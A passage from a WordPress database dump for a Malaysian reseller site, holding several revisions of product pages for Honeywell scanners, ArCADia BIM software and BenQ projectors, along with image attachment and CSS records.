09:04:34','',2048,'https://bintara.com.my/blog/2019/09/30/2048-revision-v1/',0,'revision','',0),(3594,1,'2019-09-30 17:16:13','2019-09-30 09:16:13','Our company invents and manufactures technologies that address some of the worldâ€™s most critical challenges around energy, safety, security, productivity and global urbanization. We are uniquely positioned to blend physical products with software to support connected systems that improve buildings, factories, utilities, and aircraft, and that enable a safer, more comfortable and more productive world. Our solutions enhance the quality of life of people around the globe and create new markets and even new industries.\r\n\r\nHoneywellâ€™s solutions enhance productivity and safety for more than half a billion workers annually. Our productivity solutions include a mix of products, from rugged mobile computers, voice-enabled software and workflows, bar code scanners, and printing solutions.\r\n<h2>Productivity</h2>\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Scanning --Â </strong></li>\r\n</ul>\r\n<img class=\" wp-image-2049 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/comp-device.jpg\" alt=\"\" width=\"186\" height=\"186\" />\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Computer Device --Â </strong>Honeywell offers a broad array of durable mobile computers designed to improve the productivity of mobile workers.</li>\r\n</ul>\r\n<div><img class=\" wp-image-2050 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/printer-1.jpg\" alt=\"\" width=\"186\" height=\"186\" /></div>\r\n<div></div>\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Printers and MediaÂ  --Â </strong>Honeywell printers offer solutions for any environment or application: fixed, mobile, RFID printers; labels, receipts, tags, ribbons; software.</li>\r\n</ul>\r\n<div><img class=\" wp-image-2052 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/wearable-device.jpg\" alt=\"\" width=\"186\" height=\"186\" /></div>\r\n<div></div>\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Wearable Devices --Â </strong>Honeywell wearable solutions provide a comfortable and easy-to-implement tool for mobile operators who regularly need to scan barcodes.</li>\r\n</ul>\r\n<div><img class=\"alignnone wp-image-2450\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/scan.jpg\" alt=\"\" width=\"180\" height=\"180\" /></div>\r\n<div></div>\r\n<ul>\r\n 	<li><strong>OEM Scan Engines, Decoders &amp; Modules --Â </strong>Honeywell OEM scan engines and modules deliver industry-leading, high resolution image scan performance, even on damaged or worn barcodes.</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2449\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/honeywell.jpg\" alt=\"\" width=\"183\" height=\"183\" />\r\n<ul>\r\n 	<li><strong>RFID Solution --Â </strong>Honeywell RFID readers, antennas and tags bring intelligent data collection to a wide variety of industries and RFID technology applications.</li>\r\n</ul>\r\nTo discover more product, please click the button below or contact us to discuss your needs.\r\n<div>[maxbutton id=\"1\" ]</div>\r\n<div></div>\r\n<div></div>\r\n<div></div>','Honeywell','','inherit','closed','closed','','2048-revision-v1','','','2019-09-30 17:16:13','2019-09-30 09:16:13','',2048,'https://bintara.com.my/blog/2019/09/30/2048-revision-v1/',0,'revision','',0),(3595,1,'2019-09-30 17:22:13','2019-09-30 09:22:13','Our company invents and manufactures technologies that address some of the worldâ€™s most critical challenges around energy, safety, security, productivity and global urbanization. We are uniquely positioned to blend physical products with software to support connected systems that improve buildings, factories, utilities, and aircraft, and that enable a safer, more comfortable and more productive world. Our solutions enhance the quality of life of people around the globe and create new markets and even new industries.\r\n\r\nHoneywellâ€™s solutions enhance productivity and safety for more than half a billion workers annually. Our productivity solutions include a mix of products, from rugged mobile computers, voice-enabled software and workflows, bar code scanners, and printing solutions.\r\n<h2>Productivity</h2>\r\n\r\n<table>\r\n  <tbody>\r\n    <tr align=\"center\">\r\n      <td colspan=\"2\"><h3>Scanning</h3></td>\r\n    </tr>\r\n    <tr>\r\n      <td width=\"20%\"><img class=\"wp-image-2051 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/scanning.jpg\" alt=\"\"/></td>\r\n      <td>From retail checkout to patient care to warehouse management, Honeywell barcode scanners are built to meet your demands.</td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n<table>\r\n  <tbody>\r\n    <tr align=\"center\">\r\n      <td colspan=\"2\"><h3>Computer Device</h3></td>\r\n    </tr>\r\n    <tr>\r\n      <td>Honeywell offers a broad array of durable mobile computers designed to improve the productivity of mobile workers.</td>\r\n      <td width=\"20%\"><img class=\" wp-image-2049 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/comp-device.jpg\" alt=\"\"/></td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n<table>\r\n  <tbody>\r\n    <tr align=\"center\">\r\n      <td colspan=\"2\"><h3>Printers and Media</h3></td>\r\n    </tr>\r\n    <tr>\r\n      <td width=\"20%\"><img class=\" wp-image-2050 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/printer-1.jpg\" alt=\"\"/></td>\r\n      <td>Honeywell printers offer solutions for any environment or application: fixed, mobile, RFID printers; labels, receipts, tags, ribbons; software.</td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n<table>\r\n  <tbody>\r\n    <tr align=\"center\">\r\n      <td colspan=\"2\"><h3>Wearable Devices</h3></td>\r\n    </tr>\r\n    <tr>\r\n      <td>Honeywell wearable solutions provide a comfortable and easy-to-implement tool for mobile operators who regularly need to scan barcodes.</td>\r\n      <td width=\"20%\"><img class=\" wp-image-2052 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/wearable-device.jpg\" alt=\"\"/></td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n<table>\r\n  <tbody>\r\n    <tr align=\"center\">\r\n      <td colspan=\"2\"><h3>OEM Scan Engines, Decoders &amp; Modules</h3></td>\r\n    </tr>\r\n    <tr>\r\n      <td width=\"20%\"><img class=\"alignnone wp-image-2450\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/scan.jpg\" alt=\"\"/></td>\r\n      <td>Honeywell OEM scan engines and modules deliver industry-leading, high resolution image scan performance, even on damaged or worn barcodes.</td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n<table>\r\n  <tbody>\r\n    <tr align=\"center\">\r\n      <td colspan=\"2\"><h3>RFID Solution</h3></td>\r\n    </tr>\r\n    <tr>\r\n      <td>Honeywell RFID readers, antennas and tags bring intelligent data collection to a wide variety of industries and RFID technology applications.</td>\r\n      <td width=\"20%\"><img class=\"alignnone wp-image-2449\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/honeywell.jpg\" alt=\"\"/></td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n<p>To discover more product, please click the button below or contact us to discuss your needs.</p>\r\n<center>[maxbutton id=\"1\" ]</center>','Honeywell','','inherit','closed','closed','','2048-revision-v1','','','2019-09-30 17:22:13','2019-09-30 09:22:13','',2048,'https://bintara.com.my/blog/2019/09/30/2048-revision-v1/',0,'revision','',0),(3596,1,'2019-09-30 17:23:17','2019-09-30 09:23:17','Our company invents and manufactures technologies that address some of the worldâ€™s most critical challenges around energy, safety, security, productivity and global urbanization. We are uniquely positioned to blend physical products with software to support connected systems that improve buildings, factories, utilities, and aircraft, and that enable a safer, more comfortable and more productive world. Our solutions enhance the quality of life of people around the globe and create new markets and even new industries.\r\n\r\nHoneywellâ€™s solutions enhance productivity and safety for more than half a billion workers annually. Our productivity solutions include a mix of products, from rugged mobile computers, voice-enabled software and workflows, bar code scanners, and printing solutions.\r\n<h2>Productivity</h2>\r\n\r\n<table>\r\n  <tbody>\r\n    <tr align=\"center\">\r\n      <td colspan=\"2\"><h3>Scanning</h3></td>\r\n    </tr>\r\n    <tr>\r\n      <td width=\"20%\"><img class=\"wp-image-2051 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/scanning.jpg\" alt=\"\"/></td>\r\n      <td>From retail checkout to patient care to warehouse management, Honeywell barcode scanners are built to meet your demands.</td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n<table>\r\n  <tbody>\r\n    <tr align=\"center\">\r\n      <td colspan=\"2\"><h3>Computer Device</h3></td>\r\n    </tr>\r\n    <tr>\r\n      <td>Honeywell offers a broad array of durable mobile computers designed to improve the productivity of mobile workers.</td>\r\n      <td width=\"20%\"><img class=\" wp-image-2049 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/comp-device.jpg\" alt=\"\"/></td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n<table>\r\n  <tbody>\r\n    <tr align=\"center\">\r\n      <td colspan=\"2\"><h3>Printers and Media</h3></td>\r\n    </tr>\r\n    <tr>\r\n      <td width=\"20%\"><img class=\" wp-image-2050 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/printer-1.jpg\" alt=\"\"/></td>\r\n      <td>Honeywell printers offer solutions for any environment or application: fixed, mobile, RFID printers; labels, receipts, tags, ribbons, software.</td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n<table>\r\n  <tbody>\r\n    <tr align=\"center\">\r\n      <td colspan=\"2\"><h3>Wearable Devices</h3></td>\r\n    </tr>\r\n    <tr>\r\n      <td>Honeywell wearable solutions provide a comfortable and easy-to-implement tool for mobile operators who regularly need to scan barcodes.</td>\r\n      <td width=\"20%\"><img class=\" wp-image-2052 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/wearable-device.jpg\" alt=\"\"/></td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n<table>\r\n  <tbody>\r\n    <tr align=\"center\">\r\n      <td colspan=\"2\"><h3>OEM Scan Engines, Decoders &amp; Modules</h3></td>\r\n    </tr>\r\n    <tr>\r\n      <td width=\"20%\"><img class=\"alignnone wp-image-2450\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/scan.jpg\" alt=\"\"/></td>\r\n      <td>Honeywell OEM scan engines and modules deliver industry-leading, high resolution image scan performance, even on damaged or worn barcodes.</td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n<table>\r\n  <tbody>\r\n    <tr align=\"center\">\r\n      <td colspan=\"2\"><h3>RFID Solution</h3></td>\r\n    </tr>\r\n    <tr>\r\n      <td>Honeywell RFID readers, antennas and tags bring intelligent data collection to a wide variety of industries and RFID technology applications.</td>\r\n      <td width=\"20%\"><img class=\"alignnone wp-image-2449\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/honeywell.jpg\" alt=\"\"/></td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n<p>To discover more product, please click the button below or contact us to discuss your needs.</p>\r\n<center>[maxbutton id=\"1\" ]</center>','Honeywell','','inherit','closed','closed','','2048-revision-v1','','','2019-09-30 17:23:17','2019-09-30 09:23:17','',2048,'https://bintara.com.my/blog/2019/09/30/2048-revision-v1/',0,'revision','',0),(3597,1,'2019-09-30 17:23:58','2019-09-30 09:23:58','Our company invents and manufactures technologies that address some of the worldâ€™s most critical challenges around energy, safety, security, productivity and global urbanization. We are uniquely positioned to blend physical products with software to support connected systems that improve buildings, factories, utilities, and aircraft, and that enable a safer, more comfortable and more productive world. Our solutions enhance the quality of life of people around the globe and create new markets and even new industries.\r\n\r\nHoneywellâ€™s solutions enhance productivity and safety for more than half a billion workers annually. Our productivity solutions include a mix of products, from rugged mobile computers, voice-enabled software and workflows, bar code scanners, and printing solutions.\r\n<h2>Productivity</h2>\r\n\r\n<table>\r\n  <tbody>\r\n    <tr align=\"center\">\r\n      <td colspan=\"2\"><h3>Scanning</h3></td>\r\n    </tr>\r\n    <tr>\r\n      <td width=\"20%\"><img class=\"wp-image-2051 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/scanning.jpg\" alt=\"\"/></td>\r\n      <td>From retail checkout to patient care to warehouse management, Honeywell barcode scanners are built to meet your demands.</td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n<table>\r\n  <tbody>\r\n    <tr align=\"center\">\r\n      <td colspan=\"2\"><h3>Computer Device</h3></td>\r\n    </tr>\r\n    <tr>\r\n      <td>Honeywell offers a broad array of durable mobile computers designed to improve the productivity of mobile workers.</td>\r\n      <td width=\"20%\"><img class=\" wp-image-2049 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/comp-device.jpg\" alt=\"\"/></td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n<table>\r\n  <tbody>\r\n    <tr align=\"center\">\r\n      <td colspan=\"2\"><h3>Printers and Media</h3></td>\r\n    </tr>\r\n    <tr>\r\n      <td width=\"20%\"><img class=\" wp-image-2050 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/printer-1.jpg\" alt=\"\"/></td>\r\n      <td>Honeywell printers offer solutions for any environment or application: fixed, mobile, RFID printers; labels, receipts, tags, ribbons, software.</td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n<table>\r\n  <tbody>\r\n    <tr align=\"center\">\r\n      <td colspan=\"2\"><h3>Wearable Devices</h3></td>\r\n    </tr>\r\n    <tr>\r\n      <td>Honeywell wearable solutions provide a comfortable and easy-to-implement tool for mobile operators who regularly need to scan barcodes.</td>\r\n      <td width=\"20%\"><img class=\" wp-image-2052 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/wearable-device.jpg\" alt=\"\"/></td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n<table>\r\n  <tbody>\r\n    <tr align=\"center\">\r\n      <td colspan=\"2\"><h3>OEM Scan Engines, Decoders &amp; Modules</h3></td>\r\n    </tr>\r\n    <tr>\r\n      <td width=\"20%\"><img class=\"alignnone wp-image-2450\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/scan.jpg\" alt=\"\"/></td>\r\n      <td>Honeywell OEM scan engines and modules deliver industry-leading, high resolution image scan performance, even on damaged or worn barcodes.</td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n<table>\r\n  <tbody>\r\n    <tr align=\"center\">\r\n      <td colspan=\"2\"><h3>RFID Solution</h3></td>\r\n    </tr>\r\n    <tr>\r\n      <td>Honeywell RFID readers, antennas and tags bring intelligent data collection to a wide variety of industries and RFID technology applications.</td>\r\n      <td width=\"20%\"><img class=\"alignnone wp-image-2449\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/honeywell.jpg\" alt=\"\"/></td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n&nbsp;\r\n<p>To discover more product, please click the button below or contact us to discuss your needs.</p>\r\n&nbsp;\r\n<center>[maxbutton id=\"1\" ]</center>','Honeywell','','inherit','closed','closed','','2048-revision-v1','','','2019-09-30 17:23:58','2019-09-30 09:23:58','',2048,'https://bintara.com.my/blog/2019/09/30/2048-revision-v1/',0,'revision','',0),(3598,1,'2019-10-01 09:32:17','2019-10-01 01:32:17','Our company invents and manufactures technologies that address some of the worldâ€™s most critical challenges around energy, safety, security, productivity and global urbanization. We are uniquely positioned to blend physical products with software to support connected systems that improve buildings, factories, utilities, and aircraft, and that enable a safer, more comfortable and more productive world. Our solutions enhance the quality of life of people around the globe and create new markets and even new industries.\r\n\r\nHoneywellâ€™s solutions enhance productivity and safety for more than half a billion workers annually. Our productivity solutions include a mix of products, from rugged mobile computers, voice-enabled software and workflows, bar code scanners, and printing solutions.\r\n<h2>Productivity</h2>\r\n\r\n<table class=\"clearfix entry-content\">\r\n  <tbody>\r\n    <tr align=\"center\">\r\n      <td colspan=\"2\"><h3>Scanning</h3></td>\r\n    </tr>\r\n    <tr>\r\n      <td width=\"20%\"><img class=\"wp-image-2051 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/scanning.jpg\" alt=\"\"/></td>\r\n      <td>From retail checkout to patient care to warehouse management, Honeywell barcode scanners are built to meet your demands.</td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n<table>\r\n  <tbody>\r\n    <tr align=\"center\">\r\n      <td colspan=\"2\"><h3>Computer Device</h3></td>\r\n    </tr>\r\n    <tr>\r\n      <td>Honeywell offers a broad array of durable mobile computers designed to improve the productivity of mobile workers.</td>\r\n      <td width=\"20%\"><img class=\" wp-image-2049 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/comp-device.jpg\" alt=\"\"/></td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n<table>\r\n  <tbody>\r\n    <tr align=\"center\">\r\n      <td colspan=\"2\"><h3>Printers and Media</h3></td>\r\n    </tr>\r\n    <tr>\r\n      <td width=\"20%\"><img class=\" wp-image-2050 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/printer-1.jpg\" alt=\"\"/></td>\r\n      <td>Honeywell printers offer solutions for any environment or application: fixed, mobile, RFID printers; labels, receipts, tags, ribbons, software.</td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n<table>\r\n  <tbody>\r\n    <tr align=\"center\">\r\n      <td colspan=\"2\"><h3>Wearable Devices</h3></td>\r\n    </tr>\r\n    <tr>\r\n      <td>Honeywell wearable solutions provide a comfortable and easy-to-implement tool for mobile operators who regularly need to scan barcodes.</td>\r\n      <td width=\"20%\"><img class=\" wp-image-2052 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/wearable-device.jpg\" alt=\"\"/></td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n<table>\r\n  <tbody>\r\n    <tr align=\"center\">\r\n      <td colspan=\"2\"><h3>OEM Scan Engines, Decoders &amp; Modules</h3></td>\r\n    </tr>\r\n    <tr>\r\n      <td width=\"20%\"><img class=\"alignnone wp-image-2450\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/scan.jpg\" alt=\"\"/></td>\r\n      <td>Honeywell OEM scan engines and modules deliver industry-leading, high resolution image scan performance, even on damaged or worn barcodes.</td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n<table>\r\n  <tbody>\r\n    <tr align=\"center\">\r\n      <td colspan=\"2\"><h3>RFID Solution</h3></td>\r\n    </tr>\r\n    <tr>\r\n      <td>Honeywell RFID readers, antennas and tags bring intelligent data collection to a wide variety of industries and RFID technology applications.</td>\r\n      <td width=\"20%\"><img class=\"alignnone wp-image-2449\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/honeywell.jpg\" alt=\"\"/></td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n&nbsp;\r\n<p>To discover more product, please click the button below or contact us to discuss your needs.</p>\r\n&nbsp;\r\n<center>[maxbutton id=\"1\" ]</center>','Honeywell','','inherit','closed','closed','','2048-revision-v1','','','2019-10-01 09:32:17','2019-10-01 01:32:17','',2048,'https://bintara.com.my/blog/2019/10/01/2048-revision-v1/',0,'revision','',0),(3600,1,'2019-10-01 09:33:32','2019-10-01 01:33:32','.project-4-column .project-item { width: 16.6% ; }\n\n.project-wrapper .project-header .project-small-title { font-size: 10px; } \n\n.entry-content table tr{\n    border: none;\n}','onepress','','inherit','closed','closed','','1980-revision-v1','','','2019-10-01 09:33:32','2019-10-01 01:33:32','',1980,'https://bintara.com.my/blog/2019/10/01/1980-revision-v1/',0,'revision','',0),(3605,1,'2019-10-01 09:51:51','0000-00-00 00:00:00','','Elementor #3605','','draft','closed','closed','','','','','2019-10-01 09:51:51','2019-10-01 01:51:51','',0,'https://bintara.com.my/?page_id=3605',0,'page','',0),(3606,1,'2019-10-01 11:04:53','2019-10-01 03:04:53','<h2>ArCADia BIM</h2>Â The emergence of the ArCADia BIM system is a logical consequence of the ArCADiasoft philosophy to meet the needs of designers at all stages of project development. The system intelligently supports and coordinates all participants throughout the design process in line with BIM (Building Information Modeling) technology while creating a comprehensive building information database. It provides complete control and security at all stages of design while streamlining and accelerating implementation.https://www.arcadiabimsystem.com/lib/m09yeq/ArCADia-BIM_640mp4-k0gd9l07.mp4		\n		<h2>CONSTRUCTION &amp; ENGINEERING SOFTWARE</h2><p>Arcadia have over 20 years of experience in creating computer applications for the construction industry and more than 100 products for architects and engineers. Our programs range from structural design to interior and installation design to energy performance of buildings calculations to buildingsâ€™ surroundings design.</p>		\n		<h2>ArCADia BIM SYSTEM</h2><p style=\"text-align: left;\">ArCADia BIM is more than twenty industry-specific modules. These include installation solutions for water, sewage, electricity, heating, etc., and programs intended for engineers to construct and calculate. These programs use a common database of objects (buildings), enable full cooperation between the various industries and the exchange of information and projects within and outside the system. ArCADia applications have IFC format support, which allows the user to collaborate with other programs such as Allplan, Archicad, or Revit.</p>		\n		<h2>ArCADia Tools</h2><h4>Drive &amp; Supporting Software</h4><h3 style=\"text-align: center;\">ArCADia-3D VIEWER</h3>\n<hr />\n&nbsp;\n<img src=\"https://bintara.com.my/wp-content/uploads/2019/10/3dviewer-1.jpg\" alt=\"\" /><h3 style=\"text-align: center;\">ArCADia-TEXT</h3><hr /><p>Â <br /><img src=\"https://bintara.com.my/wp-content/uploads/2019/10/text-2.jpg\" alt=\"\" /></p><h3 style=\"text-align: center;\">Licence Manager</h3>\n<hr />\n&nbsp;\n<center><img src=\"https://bintara.com.my/wp-content/uploads/2019/10/menadzer-lic-1.jpg\" alt=\"\" /></center>		\n		<p>To discover more, please click the button below or contact us to discuss your needs.</p><center>[maxbutton id=\"1\" ]</center>','Arcadia','','publish','closed','closed','','arcadia','','','2019-10-01 11:36:48','2019-10-01 03:36:48','',0,'https://bintara.com.my/?page_id=3606',0,'page','',0),(3615,1,'2019-10-01 11:17:48','2019-10-01 03:17:48','<h2>ArCADia BIM</h2>Â The emergence of the ArCADia BIM system is a logical consequence of the ArCADiasoft philosophy to meet the needs of designers at all stages of project development. The system intelligently supports and coordinates all participants throughout the design process in line with BIM (Building Information Modeling) technology while creating a comprehensive building information database. It provides complete control and security at all stages of design while streamlining and accelerating implementation.https://www.arcadiabimsystem.com/lib/m09yeq/ArCADia-BIM_640mp4-k0gd9l07.mp4		\n		<h2>CONSTRUCTION &amp; ENGINEERING SOFTWARE</h2><p>Arcadia have over 20 years of experience in creating computer applications for the construction industry and more than 100 products for architects and engineers. Our programs range from structural design to interior and installation design to energy performance of buildings calculations to buildingsâ€™ surroundings design.</p>		\n		<h2>ArCADia BIM SYSTEM</h2><p style=\"text-align: left;\">ArCADia BIM is more than twenty industry-specific modules. These include installation solutions for water, sewage, electricity, heating, etc., and programs intended for engineers to construct and calculate. These programs use a common database of objects (buildings), enable full cooperation between the various industries and the exchange of information and projects within and outside the system. ArCADia applications have IFC format support, which allows the user to collaborate with other programs such as Allplan, Archicad, or Revit.</p>		\n		<h2>ArCADia Tools</h2><h4>Drive &amp; Supporting Software</h4><h3 style=\"text-align: center;\">ArCADia-3D VIEWER</h3><h3 style=\"text-align: center;\">ArCADia-TEXT</h3>','Arcadia','','inherit','closed','closed','','3606-revision-v1','','','2019-10-01 11:17:48','2019-10-01 03:17:48','',3606,'https://bintara.com.my/blog/2019/10/01/3606-revision-v1/',0,'revision','',0),(3611,1,'2019-10-01 11:10:24','2019-10-01 03:10:24','','Arcadia Tool 3','','inherit','closed','closed','','3dviewer-2','','','2019-10-01 11:11:58','2019-10-01 03:11:58','',0,'https://bintara.com.my/wp-content/uploads/2019/10/3dviewer-1.jpg',0,'attachment','image/jpeg',0),(3612,1,'2019-10-01 11:10:27','2019-10-01 03:10:27','','Arcadia Tool 2','','inherit','closed','closed','','menadzer-lic-2','','','2019-10-01 11:11:53','2019-10-01 03:11:53','',0,'https://bintara.com.my/wp-content/uploads/2019/10/menadzer-lic-1.jpg',0,'attachment','image/jpeg',0),(3613,1,'2019-10-01 11:10:32','2019-10-01 03:10:32','','Arcadia Tool 1','','inherit','closed','closed','','text-3','','','2019-10-01 11:11:45','2019-10-01 03:11:45','',0,'https://bintara.com.my/wp-content/uploads/2019/10/text-2.jpg',0,'attachment','image/jpeg',0),(3616,1,'2019-10-01 11:17:49','2019-10-01 03:17:49','<h2>ArCADia BIM</h2>Â The emergence of the ArCADia BIM system is a logical consequence of the ArCADiasoft philosophy to meet the needs of designers at all stages of project development. The system intelligently supports and coordinates all participants throughout the design process in line with BIM (Building Information Modeling) technology while creating a comprehensive building information database. It provides complete control and security at all stages of design while streamlining and accelerating implementation.https://www.arcadiabimsystem.com/lib/m09yeq/ArCADia-BIM_640mp4-k0gd9l07.mp4		\n		<h2>CONSTRUCTION &amp; ENGINEERING SOFTWARE</h2><p>Arcadia have over 20 years of experience in creating computer applications for the construction industry and more than 100 products for architects and engineers. Our programs range from structural design to interior and installation design to energy performance of buildings calculations to buildingsâ€™ surroundings design.</p>		\n		<h2>ArCADia BIM SYSTEM</h2><p style=\"text-align: left;\">ArCADia BIM is more than twenty industry-specific modules. These include installation solutions for water, sewage, electricity, heating, etc., and programs intended for engineers to construct and calculate. These programs use a common database of objects (buildings), enable full cooperation between the various industries and the exchange of information and projects within and outside the system. ArCADia applications have IFC format support, which allows the user to collaborate with other programs such as Allplan, Archicad, or Revit.</p>		\n		<h2>ArCADia Tools</h2><h4>Drive &amp; Supporting Software</h4><h3 style=\"text-align: center;\">ArCADia-3D VIEWER</h3>\n<hr />\n&nbsp;\n<img src=\"https://bintara.com.my/wp-content/uploads/2019/10/3dviewer-1.jpg\" alt=\"\" /><h3 style=\"text-align: center;\">ArCADia-TEXT</h3><hr /><p>Â <br /><img src=\"https://bintara.com.my/wp-content/uploads/2019/10/text-2.jpg\" alt=\"\" /></p><h3 style=\"text-align: center;\">Licence Manager</h3>\n<hr />\n&nbsp;\n<center><img src=\"https://bintara.com.my/wp-content/uploads/2019/10/menadzer-lic-1.jpg\" alt=\"\" /></center>','Arcadia','','inherit','closed','closed','','3606-revision-v1','','','2019-10-01 11:17:49','2019-10-01 03:17:49','',3606,'https://bintara.com.my/blog/2019/10/01/3606-revision-v1/',0,'revision','',0),(3617,1,'2019-10-01 11:27:11','2019-10-01 03:27:11','<h1>Projectors</h1>\n<h3></h3>\n<h2>Business Projector (Smart Design for Presentations)</h2>\n<h3>High Brightness for Well-Lit Rooms</h3>\nIdeal for lights-on presentations in bright meeting rooms, BenQ business projectors produce high brightness for effective teamwork, collaboration, and note-taking. The high-lumen output ensures brilliant picture quality with vibrant colors as well as crisp text.\n<h2>Interactive Classroom Projectors</h2>\n<h3>Enhanced Learning with Smart Interactivity for Tomorrow\'s Classrooms</h3>\nFutureproof BenQ Interactive Classroom Projectors empower collaborative learning with pen or touch annotation and short / ultra-short throw projection based on brilliant laser or lamp light sources.\n<ul>\n 	<li>Industry-Leading Dustproof Design: BenQ Dust Guard<sup>TM</sup></li>\n 	<li>High Brightness from 3000-3500 ANSI Lumens</li>\n 	<li>High resolution with (Ultra) Short Throw</li>\n 	<li>Scalable for Wireless Use and Interactivity</li>\n</ul>\n<h3></h3>\n<h2>Interactive Flat Panel</h2>\n<h3>Meeting Room &amp; Boardroom</h3>\nDigital displays help businesses improve meetings by presenting pertinent information through presentations, documents, images and more. BenQ has a variety of digital display solutions such as High Brightness Business Projectors and Interactive Flat Panels, all of which have been created for ease of use, and to increase efficiency and boost participation for office environments.\n<h3>4K UHD 84\'\' Corporate Interactive Flat Panel Display | RP840G</h3>\n<h5>Work Collaboratively and Conduct Business Efficiently</h5>\nThe RP840G is a modern enterpriseâ€™s one-stop display solution for picture-perfect 4K presentation, seamless communication and real-time collaboration.With the built-in EZWrite annotation app, employees can instantly open a wide range of documents and directly mark on the screen for efficient idea sharing.\nWhether for brainstorming sessions or year-end financial meetings, the RP840G works smoothly with BenQâ€™s wireless presentation solution and allows employees to stream content from laptops or smart devices within seconds.\nFeaturing an open-platform design, the RP840G also offers unrivaled compatibility that lets employees work and discuss with the devices or software they prefer. And to encourage workplace health, the panel is built with proprietary eye-care technology so employees can focus on their jobs without suffering from eye fatigue.\n<h4></h4>\n<h5>How BenQ Display turns meeting rooms into places of efficiency</h5>\n<ul>\n 	<li>Present content wirelessly and instantly withÂ InstaShow<sup>TM</sup>, a hardware that requires no software and allows up to 16 participants to connect notebooks and take over instantly</li>\n 	<li>Display stunningly bright, crystal clear images with reliable, flexibleÂ Business ProjectorsÂ that capture staff attention, while simultaneously streamlining company meetings</li>\n 	<li>With Big Zoom and Lens Shift capability, flexible installation and easy calibration is possible onÂ Business Projectors,Â even in large boardrooms</li>\n 	<li>With BenQâ€™sÂ Smart DisplayÂ plus InstaQShare app pre-installed in your PC, smartphone and tablet, all presentations can go wirelessly.</li>\n</ul>\n<center>[maxbutton id=\"1\" ]</center>','BenQ','','inherit','closed','closed','','2834-autosave-v1','','','2019-10-01 11:27:11','2019-10-01 03:27:11','',2834,'https://bintara.com.my/blog/2019/10/01/2834-autosave-v1/',0,'revision','',0),(3620,1,'2019-10-01 11:36:48','2019-10-01 03:36:48','<h2>ArCADia BIM</h2>Â The emergence of the ArCADia BIM system is a logical consequence of the ArCADiasoft philosophy to meet the needs of designers at all stages of project development. The system intelligently supports and coordinates all participants throughout the design process in line with BIM (Building Information Modeling) technology while creating a comprehensive building information database. It provides complete control and security at all stages of design while streamlining and accelerating implementation.https://www.arcadiabimsystem.com/lib/m09yeq/ArCADia-BIM_640mp4-k0gd9l07.mp4		\n		<h2>CONSTRUCTION &amp; ENGINEERING SOFTWARE</h2><p>Arcadia have over 20 years of experience in creating computer applications for the construction industry and more than 100 products for architects and engineers. Our programs range from structural design to interior and installation design to energy performance of buildings calculations to buildingsâ€™ surroundings design.</p>		\n		<h2>ArCADia BIM SYSTEM</h2><p style=\"text-align: left;\">ArCADia BIM is more than twenty industry-specific modules. These include installation solutions for water, sewage, electricity, heating, etc., and programs intended for engineers to construct and calculate. These programs use a common database of objects (buildings), enable full cooperation between the various industries and the exchange of information and projects within and outside the system. ArCADia applications have IFC format support, which allows the user to collaborate with other programs such as Allplan, Archicad, or Revit.</p>		\n		<h2>ArCADia Tools</h2><h4>Drive &amp; Supporting Software</h4><h3 style=\"text-align: center;\">ArCADia-3D 